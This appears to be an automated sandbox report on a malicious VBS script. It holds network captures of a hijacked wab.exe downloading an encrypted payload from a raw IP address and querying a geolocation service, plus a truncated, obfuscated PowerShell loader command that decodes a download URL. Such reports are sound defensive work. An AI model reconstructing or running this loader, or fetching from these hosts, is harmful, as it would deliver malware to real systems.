                    Data Ascii: v1bbV3toX5nMlNbINDhmon6Ssy98ll12Warb2e93Dm70wiBCSejvNIpwNWPqMq7KgLwQXKGKmlGQzxBn3Z7QhYRFwbToEJxLCM4MDi1TbkqQ+EAUIXKF7hSqPrxkmTiMlIoDfliryQBslMQMja5cHc7Y8l6BV/YwtughSM4B/2/LM1unCO9UXHyVK983YOaghslJuVwaJsFl+U4qrAbgpxSZQif0fEqlz/nr5iGC+uFBPWo3yB8
                    Jul 2, 2024 07:50:07.757684946 CEST896INData Raw: 76 31 62 62 56 33 74 6f 58 35 6e 4d 6c 4e 62 49 4e 44 68 6d 6f 6e 36 53 73 79 39 38 6c 6c 31 32 57 61 72 62 32 65 39 33 44 6d 37 30 77 69 42 43 53 65 6a 76 4e 49 70 77 4e 57 50 71 4d 71 37 4b 67 4c 77 51 58 4b 47 4b 6d 6c 47 51 7a 78 42 6e 33 5a
                    Data Ascii: v1bbV3toX5nMlNbINDhmon6Ssy98ll12Warb2e93Dm70wiBCSejvNIpwNWPqMq7KgLwQXKGKmlGQzxBn3Z7QhYRFwbToEJxLCM4MDi1TbkqQ+EAUIXKF7hSqPrxkmTiMlIoDfliryQBslMQMja5cHc7Y8l6BV/YwtughSM4B/2/LM1unCO9UXHyVK983YOaghslJuVwaJsFl+U4qrAbgpxSZQif0fEqlz/nr5iGC+uFBPWo3yB8
                    Jul 2, 2024 07:50:07.757716894 CEST1236INHTTP/1.1 200 OK
                    Content-Type: application/octet-stream
                    Last-Modified: Mon, 01 Jul 2024 07:42:49 GMT
                    Accept-Ranges: bytes
                    ETag: "cd8162458acbda1:0"
                    Server: Microsoft-IIS/8.5
                    Date: Tue, 02 Jul 2024 05:50:02 GMT
                    Content-Length: 459660
                    Data Raw: 63 51 47 62 63 51 47 62 75 77 76 62 44 41 42 78 41 5a 74 78 41 5a 73 44 58 43 51 45 63 51 47 62 63 51 47 62 75 56 30 79 7a 72 68 78 41 5a 74 78 41 5a 75 42 38 66 35 75 66 75 2f 72 41 71 78 6f 63 51 47 62 67 65 6d 6a 58 4c 42 58 36 77 4b 4b 6e 58 45 42 6d 33 45 42 6d 2b 73 43 66 37 36 36 52 49 2b 32 72 6e 45 42 6d 33 45 42 6d 2b 73 43 4a 38 54 72 41 74 73 74 4d 63 70 78 41 5a 76 72 41 6a 35 53 69 52 51 4c 36 77 49 2f 78 2b 73 43 67 4f 62 52 34 75 73 43 68 4f 6c 78 41 5a 75 44 77 51 54 72 41 6e 71 63 36 77 49 78 63 59 48 35 74 51 63 31 42 48 7a 49 36 77 4a 66 44 58 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 6b 2b 35 69 63 50 72 41 70 6c 79 36 77 4b 75 59 34 48 44 34 54 4b 35 41 75 73 43 46 33 74 78 41 5a 75 36 6a 33 66 42 4b 6e 45 42 6d 33 45 42 6d 34 48 79 2b 45 6b 55 70 58 45 42 6d 33 45 42 6d 34 48 43 69 63 45 71 63 4f 73 43 59 33 35 78 41 5a 74 78 41 5a 76 72 41 69 61 57 63 51 47 62 36 77 4c 31 4a 49 73 4d 45 4f 73 43 41 56 52 78 41 5a 75 4a 44 42 50 72 41 67 79 75 63 51 47 62 51 6e 45 42 6d 2b [TRUNCATED]
                    Data Ascii: cQGbcQGbuwvbDABxAZtxAZsDXCQEcQGbcQGbuV0yzrhxAZtxAZuB8f5ufu/rAqxocQGbgemjXLBX6wKKnXEBm3EBm+sCf766RI+2rnEBm3EBm+sCJ8TrAtstMcpxAZvrAj5SiRQL6wI/x+sCgObR4usChOlxAZuDwQTrAnqc6wIxcYH5tQc1BHzI6wJfDXEBm4tEJARxAZvrAk+5icPrAply6wKuY4HD4TK5AusCF3txAZu6j3fBKnEBm3EBm4Hy+EkUpXEBm3EBm4HCicEqcOsCY35xAZtxAZvrAiaWcQGb6wL1JIsMEOsCAVRxAZuJDBPrAgyucQGbQnEBm+sCoteB+sDMBAB11XEBm3EBm4lcJAzrAkkfcQGbge0AAwAAcQGbcQGbi1QkCHEBm+sCchOLfCQE6wLAIOsC41KJ63EBm3EBm4HDnAAAAOsC3gFxAZtTcQGb6wLUSGpAcQGb6wKSqYnrcQGbcQGbx4MAAQAAAPBEBHEBm3EBm4HDAAEAAOsCcOVxAZtTcQGb6wLx2YnrcQGbcQGbibsEAQAAcQGbcQGbgcMEAQAAcQGbcQGbU+sCllDrAsTnav/rAnBZcQGbg8IF6wL94XEBmzH26wLBxXEBmzHJ6wJ8mnEBm4sacQGbcQGbQXEBm+sCEX45HAp18+sC9V3rAmv8RusCrfpxAZuAfAr7uHXccQGb6wIHS4tECvxxAZtxAZsp8HEBm3EBm//ScQGbcQGbusDMBABxAZtxAZsxwHEBm+sCqBKLfCQM6wLmK+sCZGeBNAdIo+vJ6wJqkXEBm4PABOsCRGRxAZs50HXkcQGbcQGbiftxAZvrAsXw/9dxAZvrAnhTzESNTIjFbhnBRiyM0IfA/fgirlGzhR6rydZzGnkBu0g9Oyepw+CnNgU7njMdKg5MmxpznoGBajjkW/JJcGBqIMXzlFDJSmSXGaosjUWjtzbeU9IQyc/myS/K5MdwVmqlRaNm5ppXao1Fo3
                    Jul 2, 2024 07:50:07.758057117 CEST1236INHTTP/1.1 200 OK
                    Content-Type: application/octet-stream
                    Last-Modified: Mon, 01 Jul 2024 07:42:49 GMT
                    Accept-Ranges: bytes
                    ETag: "cd8162458acbda1:0"
                    Server: Microsoft-IIS/8.5
                    Date: Tue, 02 Jul 2024 05:50:02 GMT
                    Content-Length: 459660
                    Data Raw: 63 51 47 62 63 51 47 62 75 77 76 62 44 41 42 78 41 5a 74 78 41 5a 73 44 58 43 51 45 63 51 47 62 63 51 47 62 75 56 30 79 7a 72 68 78 41 5a 74 78 41 5a 75 42 38 66 35 75 66 75 2f 72 41 71 78 6f 63 51 47 62 67 65 6d 6a 58 4c 42 58 36 77 4b 4b 6e 58 45 42 6d 33 45 42 6d 2b 73 43 66 37 36 36 52 49 2b 32 72 6e 45 42 6d 33 45 42 6d 2b 73 43 4a 38 54 72 41 74 73 74 4d 63 70 78 41 5a 76 72 41 6a 35 53 69 52 51 4c 36 77 49 2f 78 2b 73 43 67 4f 62 52 34 75 73 43 68 4f 6c 78 41 5a 75 44 77 51 54 72 41 6e 71 63 36 77 49 78 63 59 48 35 74 51 63 31 42 48 7a 49 36 77 4a 66 44 58 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 6b 2b 35 69 63 50 72 41 70 6c 79 36 77 4b 75 59 34 48 44 34 54 4b 35 41 75 73 43 46 33 74 78 41 5a 75 36 6a 33 66 42 4b 6e 45 42 6d 33 45 42 6d 34 48 79 2b 45 6b 55 70 58 45 42 6d 33 45 42 6d 34 48 43 69 63 45 71 63 4f 73 43 59 33 35 78 41 5a 74 78 41 5a 76 72 41 69 61 57 63 51 47 62 36 77 4c 31 4a 49 73 4d 45 4f 73 43 41 56 52 78 41 5a 75 4a 44 42 50 72 41 67 79 75 63 51 47 62 51 6e 45 42 6d 2b [TRUNCATED]
                    Data Ascii: cQGbcQGbuwvbDABxAZtxAZsDXCQEcQGbcQGbuV0yzrhxAZtxAZuB8f5ufu/rAqxocQGbgemjXLBX6wKKnXEBm3EBm+sCf766RI+2rnEBm3EBm+sCJ8TrAtstMcpxAZvrAj5SiRQL6wI/x+sCgObR4usChOlxAZuDwQTrAnqc6wIxcYH5tQc1BHzI6wJfDXEBm4tEJARxAZvrAk+5icPrAply6wKuY4HD4TK5AusCF3txAZu6j3fBKnEBm3EBm4Hy+EkUpXEBm3EBm4HCicEqcOsCY35xAZtxAZvrAiaWcQGb6wL1JIsMEOsCAVRxAZuJDBPrAgyucQGbQnEBm+sCoteB+sDMBAB11XEBm3EBm4lcJAzrAkkfcQGbge0AAwAAcQGbcQGbi1QkCHEBm+sCchOLfCQE6wLAIOsC41KJ63EBm3EBm4HDnAAAAOsC3gFxAZtTcQGb6wLUSGpAcQGb6wKSqYnrcQGbcQGbx4MAAQAAAPBEBHEBm3EBm4HDAAEAAOsCcOVxAZtTcQGb6wLx2YnrcQGbcQGbibsEAQAAcQGbcQGbgcMEAQAAcQGbcQGbU+sCllDrAsTnav/rAnBZcQGbg8IF6wL94XEBmzH26wLBxXEBmzHJ6wJ8mnEBm4sacQGbcQGbQXEBm+sCEX45HAp18+sC9V3rAmv8RusCrfpxAZuAfAr7uHXccQGb6wIHS4tECvxxAZtxAZsp8HEBm3EBm//ScQGbcQGbusDMBABxAZtxAZsxwHEBm+sCqBKLfCQM6wLmK+sCZGeBNAdIo+vJ6wJqkXEBm4PABOsCRGRxAZs50HXkcQGbcQGbiftxAZvrAsXw/9dxAZvrAnhTzESNTIjFbhnBRiyM0IfA/fgirlGzhR6rydZzGnkBu0g9Oyepw+CnNgU7njMdKg5MmxpznoGBajjkW/JJcGBqIMXzlFDJSmSXGaosjUWjtzbeU9IQyc/myS/K5MdwVmqlRaNm5ppXao1Fo3
                    Jul 2, 2024 07:50:07.764110088 CEST1236INData Raw: 6f 67 71 52 77 75 76 69 4c 76 37 56 49 36 65 76 76 4a 6c 38 2f 6c 43 71 43 2f 53 47 53 48 46 68 67 79 33 6f 4e 49 33 76 71 49 51 4d 58 56 36 63 6c 49 47 71 77 37 31 74 2b 39 64 37 52 33 74 32 7a 4a 56 57 6b 62 70 6e 78 71 4a 7a 41 73 57 72 50 42
                    Data Ascii: ogqRwuviLv7VI6evvJl8/lCqC/SGSHFhgy3oNI3vqIQMXV6clIGqw71t+9d7R3t2zJVWkbpnxqJzAsWrPBnVywcc76W2O8owou/M2MhPy55EDmpr7KTgbtjej0WwcUh+LFMHv7u4RaM4dVCn4k6dHgF/1qOBEaTYnJYoxGK1tqCNiGjwIbGLBXoJBqOvOZuVzJYMuVDfq8VcFE6tbVmiG3Wm/hCs6ZO6+X/EB6Awvh5fHKbpyLb
                    Jul 2, 2024 07:50:07.764168024 CEST1236INData Raw: 32 62 77 54 62 70 79 30 69 6a 55 5a 6d 4a 61 41 65 66 39 6e 5a 35 39 6d 67 69 48 64 36 72 63 39 68 49 6a 70 43 2f 4a 6e 67 69 42 56 62 58 66 61 39 41 58 6f 66 47 6e 6e 4b 52 63 35 39 64 43 62 43 57 53 63 6f 46 54 74 6e 6f 41 4b 76 65 2f 57 6f 37
                    Data Ascii: 2bwTbpy0ijUZmJaAef9nZ59mgiHd6rc9hIjpC/JngiBVbXfa9AXofGnnKRc59dCbCWScoFTtnoAKve/Wo7fIT1s8lRnPOFSmo7Wn/zthsYpSPBEmoi9NStYslQzi7FG2oiGPEld8GYIeAGvfyU3sAYEw4PHqoaf25DFSC3w9ByAh1wjm0DafS1c8SnPf4OmxIk8173fS5TppKE1P/xiCvXxoLid16fNLA+UDOVRxcfsJBxdWBcS
                    Jul 2, 2024 07:50:07.764179945 CEST1236INData Raw: 42 67 56 4b 53 69 36 38 6b 65 48 59 48 43 65 69 35 71 4a 32 46 63 44 47 66 4a 54 58 72 6d 41 58 31 69 7a 7a 31 30 75 42 42 4d 46 79 38 45 51 41 49 34 44 4d 43 74 33 65 79 54 69 75 4e 57 70 43 37 46 68 4a 4a 73 4e 45 51 4c 75 4c 56 41 78 62 2f 70
                    Data Ascii: BgVKSi68keHYHCei5qJ2FcDGfJTXrmAX1izz10uBBMFy8EQAI4DMCt3eyTiuNWpC7FhJJsNEQLuLVAxb/pyUgaL8bbdydwt4HGzXqFDKRMg/ATjoLWWqH6GsVHo/sYSKPsRrpQtUR2w65k4PoLW4jkFzEumg0m8xDFXXIVLkihNocHQSIaV3e6/8aPmg3JSKEHlT4ccyajPYylLtMkaTttKhKmfAwphf679/Gouh5PIiqGK4HKm
                    Jul 2, 2024 07:50:07.764333010 CEST1236INData Raw: 68 36 69 4d 6c 49 6e 53 41 47 55 38 4a 6c 63 34 67 6b 73 31 44 6b 61 71 70 59 31 4e 47 54 42 2f 76 79 55 6d 53 78 73 30 56 49 69 64 4c 6f 74 4b 45 69 47 69 4a 61 53 2f 46 49 75 53 6c 67 43 4b 73 69 4b 6b 6a 55 2b 48 71 61 31 43 6f 49 79 45 4d 2b
                    Data Ascii: h6iMlInSAGU8Jlc4gks1DkaqpY1NGTB/vyUmSxs0VIidLotKEiGiJaS/FIuSlgCKsiKkjU+Hqa1CoIyEM+jUyT2uBqq9JD477pch+wenXwgPjTGBHxYFw4oevJhOaUKzqr7kQb+H4GYmvLIVayuSgjaLJfR5P+H2ejP7lz81OyRUw0/LCwn4Z98cJS2CrzTrg4X8+X7vZdsJty64Pa7syxaXEOwCMtH3uPyd4hm96RIIpbCDXzU
                    Jul 2, 2024 07:50:07.764343977 CEST1236INData Raw: 4d 55 7a 51 31 49 70 38 66 74 6c 46 63 69 42 4a 4e 34 47 79 2f 47 53 4c 4f 54 79 55 69 31 49 39 69 67 2f 32 6a 6c 2f 2f 78 7a 78 6a 4c 6f 36 73 36 57 6c 56 41 6d 70 44 69 47 58 4a 57 74 45 45 67 45 72 67 54 6f 68 55 41 6f 76 65 6c 63 54 63 30 78
                    Data Ascii: MUzQ1Ip8ftlFciBJN4Gy/GSLOTyUi1I9ig/2jl//xzxjLo6s6WlVAmpDiGXJWtEEgErgTohUAovelcTc0x2NioCfRgdLWi68keHR6G4ChqPw/9d/bJZQuhhOhix3kmbOheYmRI5z8Dt3BlXP8yQ9ltrqnmJH9Hq8dybMwkWqD9/73JaRblFCm+pppVCxZcXolJo+shDz/vycPk50DN0+rJSPRUJHJuREi/3nM4yCIcO04rTkinD


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.749707103.237.86.247807732C:\Program Files (x86)\Windows Mail\wab.exe
                    TimestampBytes transferredDirectionData
                    Jul 2, 2024 07:50:46.177380085 CEST176OUTGET /mbLXhRfFSSN77.bin HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                    Host: 103.237.86.247
                    Cache-Control: no-cache
                    Jul 2, 2024 07:50:47.356218100 CEST1236INHTTP/1.1 200 OK
                    Content-Type: application/octet-stream
                    Last-Modified: Mon, 01 Jul 2024 07:38:33 GMT
                    Accept-Ranges: bytes
                    ETag: "559e3ac89cbda1:0"
                    Server: Microsoft-IIS/8.5
                    Date: Tue, 02 Jul 2024 05:50:41 GMT
                    Content-Length: 494656
                    Data Raw: 4f 18 27 c2 5d d3 10 6c b1 d6 f0 14 03 48 ad 71 b6 a4 a2 f1 57 96 82 1f f7 5b 40 56 4c 60 37 c2 68 c7 83 42 e9 2c 95 fb 72 50 43 48 72 98 38 a4 f5 c1 38 aa 4d ea 57 76 02 39 3e 21 cb 41 3a f1 89 46 fd 83 f0 e6 c2 62 1e ef 92 7c e2 e4 70 3e a1 a3 93 5e fc b7 88 3e 24 17 bc 82 e0 52 ac c2 96 af 50 71 6b c5 0f f9 ee 7d f1 99 80 3b 47 f4 9f 5a c7 14 a3 17 da 0c e6 d5 22 ae fa 60 13 24 47 c7 8e c6 4d 43 ee 32 5d a5 f8 52 f3 ad 40 a0 6e 99 8b b0 b0 93 f3 89 9f c3 ab fa 4f a1 d8 e2 62 c6 70 fc 3e 65 f6 18 11 e4 9b 0d ab 1b f3 63 f3 db f1 25 65 68 a9 83 65 cc 91 4b a3 f5 02 c4 f2 18 34 79 d4 26 b7 8d 61 32 d4 5e 7c 57 f8 ee 88 30 c1 64 a5 ad dc 60 89 5c 04 2e 4a 3d 3f ad 19 b9 ba 9f e6 2d 48 b9 33 5f 8a 63 60 4d fd c4 4d 2e 7b 28 dc 01 9b 93 06 04 17 92 5b 47 d3 04 99 ee a4 82 40 e4 51 29 1a a6 b6 02 e9 5b d9 66 08 94 6f 80 f0 f5 29 bc aa 54 65 49 63 3b 59 53 3d d2 6c 88 ac 1d 3e 0d d9 38 8d a7 25 90 f9 f2 7d ff 13 11 a3 3b 1b c6 ce d7 7a ce e5 50 81 b8 23 6a fc 66 ba 38 c3 fe f2 8d 1c d2 01 b9 91 91 f4 1e [TRUNCATED]
                    Data Ascii: O']lHqW[@VL`7hB,rPCHr88MWv9>!A:Fb|p>^>$RPqk};GZ"`$GMC2]R@nObp>ec%eheK4y&a2^|W0d`\.J=?-H3_c`MM.{([G@Q)[fo)TeIc;YS=l>8%};zP#jf8gW28X?I<`%F~Ck`cI$mzl<@'_t#4y(Ee{(&iNC;uA:j$XJ;Saz*KpVN;7:EO",qe'}.>1O'N*J79a4$oPm^Q`=;<J[qtA-i|.uL fY2@__Z!u4^;Sh0nbMx3(dP\`\bBJ9'ahf3OIn~E yCEeyM@wTc8!,b+%z'GBlHi~\(&^Uf8qwfsaOc_Ky}]>Gy1X^f+`\-Ya$O~aU$Ycdt-o:2h|v|x+GKHz3L>EJw6>n=gfbuH'eD=|t?p
                    Jul 2, 2024 07:50:47.356235981 CEST1236INData Raw: 5a f8 a8 57 bc 59 e7 4f 38 ef a5 90 37 e0 ef 7d 99 8d 77 12 56 f1 7a da 53 74 41 52 6a 4d a4 64 ae f7 ae b1 56 d8 70 bf a3 37 57 63 42 8f 04 65 07 9f 8d d9 ef 2d 14 78 b4 6e 8c 98 da 4d 77 f3 2b f2 f1 d0 2f 21 13 67 ea d6 cf 91 0b de 62 44 cf 20
                    Data Ascii: ZWYO87}wVzStARjMdVp7WcBe-xnMw+/!gbD t@-d>4//adV5)W,#hM[dT-kid]EwII#bJ3b>HM<hNlY3iYRqslEqCE0am$/k4#XZcDu?
                    Jul 2, 2024 07:50:47.356250048 CEST1236INData Raw: 00 f1 38 ee a9 e7 ff 3f e9 cb b8 20 6b 27 25 39 17 72 43 0e 73 2e 25 2e 60 1e 3e 18 49 18 7d be ec 7a d5 2c 87 07 c7 f6 d7 15 5f 64 85 0c 76 73 79 f4 ee a7 47 65 c0 b8 c0 f0 07 90 27 01 0e b7 05 fd c4 f4 bd 2f ce 45 55 34 b1 06 1d f0 38 c9 b2 05
                    Data Ascii: 8? k'%9rCs.%.`>I}z,_dvsyGe'/EU48E$[XJS?*Z;sYBn$)_}RL0hf'$9mW>3-DO*jx4`M DYF-]"x0qSn+W@Stl<>#PNpjy8{pBb
                    Jul 2, 2024 07:50:47.356772900 CEST1236INData Raw: 77 0b 2c 83 32 62 be a0 6a 39 b0 3a 2f b9 a0 d6 79 10 72 2b 71 4b 9e 3b 31 45 bd a5 ef ad 67 45 72 0c 68 31 6b d7 cf c9 fb be a2 4f ba 39 a7 98 24 d0 53 16 d0 45 b9 b1 8a de 7f ce 40 18 db 2e 81 f0 cb fb 82 09 89 3c bd 74 d4 d3 22 27 95 87 97 2a
                    Data Ascii: w,2bj9:/yr+qK;1EgErh1kO9$SE@.<t"'*`v+lo6G)~{&2]c;>D1[/T!Pw;FeG2=FE6`;Sz8nlt,)81;~ i|!1k
                    Jul 2, 2024 07:50:47.356785059 CEST896INData Raw: cc 79 33 14 55 45 6e 45 60 30 b9 05 fe 11 80 f6 be 16 49 fa b4 d5 3d 23 0d 4d 21 62 d6 d4 25 b4 d4 7a 32 f8 3a cc b7 0f 64 6b 83 dc b4 8c 78 d6 e5 65 f8 4a 40 1e d7 b4 8c 47 54 f2 e7 4f 38 b1 2e 75 6a 22 fb 7d cf 06 86 fa db f2 7a da d8 20 65 5a
                    Data Ascii: y3UEnE`0I=#M!b%z2:dkxeJ@GTO8.uj"}z eZQv%9F{Tpi/`Je-]n\t$6n.g<4/X"4E9 CwV[bx%1D=|t:?8f\Kqk$w=AYff
                    Jul 2, 2024 07:50:47.356796026 CEST896INData Raw: cc 79 33 14 55 45 6e 45 60 30 b9 05 fe 11 80 f6 be 16 49 fa b4 d5 3d 23 0d 4d 21 62 d6 d4 25 b4 d4 7a 32 f8 3a cc b7 0f 64 6b 83 dc b4 8c 78 d6 e5 65 f8 4a 40 1e d7 b4 8c 47 54 f2 e7 4f 38 b1 2e 75 6a 22 fb 7d cf 06 86 fa db f2 7a da d8 20 65 5a
                    Data Ascii: y3UEnE`0I=#M!b%z2:dkxeJ@GTO8.uj"}z eZQv%9F{Tpi/`Je-]n\t$6n.g<4/X"4E9 CwV[bx%1D=|t:?8f\Kqk$w=AYff
                    Jul 2, 2024 07:50:47.413511992 CEST1236INData Raw: f1 fe 27 4a ee e6 d4 58 2c 4f 28 ee ac 19 8e ab e3 73 90 43 ac 72 d3 63 42 ba 79 a2 b7 6d 18 82 56 42 48 7a bd ea b7 f0 1c d9 50 af 90 65 1b 01 9f 6e e0 31 c3 55 c1 3a b3 84 f4 4a 68 1e 05 de ca 91 ea c5 74 c2 e9 a3 c3 56 2f c4 52 81 cf a3 59 2a
                    Data Ascii: 'JX,O(sCrcBymVBHzPen1U:JhtV/RY*5Z}LMfs;|J&m_]0d7Do*rP}C6Z/\%&F"H9hUCp&-\gCP=p[e/
                    Jul 2, 2024 07:50:47.413527012 CEST224INData Raw: bf cf e1 71 00 a7 94 e0 4b 7e 73 d1 41 3d 82 21 eb f6 e5 0a ca 4e 1d dc 4a db 1d 97 4e a8 63 f6 69 91 69 39 16 bb 12 50 c4 13 81 76 f0 c6 ee 2e f8 4a ec f0 27 50 ec 46 1d c7 33 cb 9a 76 77 0c be 63 5b 04 31 a1 a4 6d 29 89 3a be cb 82 95 b7 47 0f
                    Data Ascii: qK~sA=!NJNcii9Pv.J'PF3vwc[1m):G_5E"KYQuj3U<vSU4'06@@"!%T(@j<Q*-BYBZqj.bl_ mYm0cPX*lCn
                    Jul 2, 2024 07:50:47.413537979 CEST1236INData Raw: 91 39 21 58 eb a1 01 bb 8e 76 33 df 9a 04 b6 91 85 8d d1 ed 42 71 fe 39 88 fe 13 e6 17 a3 c7 48 c4 8f 3b 57 f9 1d fb 32 9e 64 69 8f 7b 78 73 ac 11 10 d4 84 2f 7c 70 be dd 3a 8f e8 07 a0 b9 4a 59 7d 44 0b 14 ec 8a 5c 13 96 cc d3 d2 e2 5f 3f 41 27
                    Data Ascii: 9!Xv3Bq9H;W2di{xs/|p:JY}D\_?A'VH&{6eeCV5RQjB=nQP!];tN@K1 7y.:UWr9R/Ck eU^O-c_vsuo9qxg|A]b*^/}8Z)l
                    Jul 2, 2024 07:50:47.413548946 CEST224INData Raw: 55 aa 69 2c b3 9a 1a 90 34 b1 eb fc 22 d6 16 da db 97 bf 1e 31 6d 73 76 94 25 0e 20 47 c4 90 a1 56 52 a0 48 34 d4 37 a2 bc f2 f5 ac 95 ae f2 7b ef d1 62 0a c3 35 3e a4 fd fd 9a ed 2f 5b f7 74 52 ce d8 0b a9 9a d3 76 12 06 d3 2d e2 5b 08 8e 84 f3
                    Data Ascii: Ui,4"1msv% GVRH47{b5>/[tRv-[H<N]LwV$c^f;?K}]x|chohM!5}>,LGa@FBZ&an]{4i$@d-:>
                    Jul 2, 2024 07:50:47.413605928 CEST1236INData Raw: d7 cc b9 21 be d2 14 cc 5d 13 a5 1d 71 e1 bf f6 56 65 81 e6 a9 0e f1 12 bb 44 40 52 6a c4 e1 88 2d ba 52 4e bd e0 f9 da 53 bc 12 6b cb ca 0c a3 42 63 8f 99 bf a6 59 90 5c a1 78 67 25 c6 bf 1b 22 f3 f1 d0 a6 64 ff a0 af 2a ce 91 0b de da 1f e2 60
                    Data Ascii: !]qVeD@Rj-RNSkBcY\xg%"d*``R(m*e!k;j1EJ_3^k.8p1.3oNgAE"0R""3FT[5=kkp?!q'-[, $0=s!?Y`~/3[5c


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.749710178.237.33.50807732C:\Program Files (x86)\Windows Mail\wab.exe
                    TimestampBytes transferredDirectionData
                    Jul 2, 2024 07:50:52.749238014 CEST71OUTGET /json.gp HTTP/1.1
                    Host: geoplugin.net
                    Cache-Control: no-cache
                    Jul 2, 2024 07:50:53.370238066 CEST1170INHTTP/1.1 200 OK
                    date: Tue, 02 Jul 2024 05:50:53 GMT
                    server: Apache
                    content-length: 962
                    content-type: application/json; charset=utf-8
                    cache-control: public, max-age=300
                    access-control-allow-origin: *
                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:01:50:00
                    Start date:02/07/2024
                    Path:C:\Windows\System32\wscript.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
                    Imagebase:0x7ff776ec0000
                    File size:170'496 bytes
                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:2
                    Start time:01:50:03
                    Start date:02/07/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 